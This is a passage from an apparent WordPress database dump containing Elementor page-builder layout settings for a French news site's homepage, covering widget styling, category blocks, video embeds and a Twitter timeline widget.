"400\",\"height\":\"510\",\"category_bg_color\":\"#c9975f\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":10,\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"17\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"offset\":\"0\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"48mal4x\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.960\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"x20xpc5\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#ea7441\",\"category_bg_hover_color\":\"#ea7441\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"y4m8rgg\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"6\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#e5e100\",\"category_bg_hover_color\":\"#e5e100\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_color1\":\"rgba(255,255,255,0.5)\",\"post_icon_color2\":\"rgba(255,255,255,0.5)\",\"post_icon_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c10cdqk\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"cnfm4uk\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ofz40wf\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":17}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ghxiaw4\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"p0xcklh\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"tdxggq6\",\"elType\":\"widget\",\"settings\":{\"title\":\"Populaires\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"p72uffi\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"4\",\"orderby\":\"name\",\"loop_infinite_class\":\"loop-infinte-list-2\",\"width\":\"\",\"height\":\"\",\"title_font_size\":{\"unit\":\"px\",\"size\":19},\"use_meta\":\"\",\"use_excerpt\":\"\",\"use_button\":\"\",\"content_half_mobile\":{\"unit\":\"px\",\"size\":270},\"content_half_2_mobile\":{\"unit\":\"px\",\"size\":300}},\"elements\":[],\"widgetType\":\"magzma-post-list-2\"}],\"isInner\":false},{\"id\":\"h33oed1\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"z1s2m91\",\"elType\":\"widget\",\"settings\":{\"title\":\"Videos \",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"tb167uj\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=0jeXbexRihs\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"},{\"id\":\"4pok7wn\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=c_ixEg9Gszk&feature=youtu.be\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"},{\"id\":\"m45qqz3\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=wQaejvxoQ2o\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"dzzumio\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"q3q9ybg\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"tbcuyne\",\"elType\":\"widget\",\"settings\":{\"title\":\"Technologie\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8sxkg8r\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"yxax9tw\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"cetl99v\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"6\",\"category\":[\"3\"],\"title_font_size\":{\"unit\":\"px\",\"size\":16},\"use_date\":\"\",\"use_excerpt\":\"\",\"animate\":\"\",\"animetime\":0},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false},{\"id\":\"583gbbd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ed1i4kp\",\"elType\":\"widget\",\"settings\":{\"wp\":{\"title\":\"Suivez nous sur Twitter\",\"twitter_timeline_type\":\"username\",\"twitter_widget_username\":\"Gn_innovations\",\"twitter_widget_id\":\"\",\"twitter_widget_width\":\"\",\"twitter_widget_height\":\"400\",\"twitter_widget_tweet_limit\":\"4\",\"twitter_widget_theme\":\"light\",\"twitter_widget_link_color\":\"#3b94d9\",\"twitter_widget_border_color\":\"#f5f5f5\"}},\"elements\":[],\"widgetType\":\"wp-widget-do-etfw\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0h88cw7\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0d8cxde\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"gw32h4p\",\"elType\":\"widget\",\"settings\":{\"title\":\"Agriculture\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8hg86ic\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"i9kn0sp\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"fxvmt3h\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"3\",\"category\":[\"2\"],\"excerpt_value\":10},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bguffns\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"15hcw7d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ptqj2h6\",\"elType\":\"widget\",\"settings\":{\"title\":\"Autres\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ub0yntr\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"tkvnvir\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(2270,740,'_elementor_version','0.4'),(2271,740,'_elementor_css','a:3:{s:4:\"time\";i:1509016646;s:5:\"fonts\";a:1:{i:0;s:5:\"Arial\";}s:6:\"status\";s:4:\"file\";}'),(2274,741,'_elementor_edit_mode','builder'),(2275,741,'_elementor_data','[{\"id\":\"cgfdli8\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":1170},\"gap\":\"no\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"90zub0t\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"9wd6jr7\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"30\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"so55224\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.961\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"gvq9sbs\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"2\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#4caf50\",\"category_bg_hover_color\":\"#4caf50\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"offset\":\"0\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"dghaq27\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"offset\":\"0\",\"category\":[\"17\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"56\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#266cc9\",\"category_bg_hover_color\":\"#266cc9\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"6uc2i0p\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"44.078\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"fb4g874\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"78.5\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"510\",\"category_bg_color\":\"#c9975f\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":10,\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"17\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"offset\":\"0\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"48mal4x\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.960\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"x20xpc5\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#ea7441\",\"category_bg_hover_color\":\"#ea7441\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{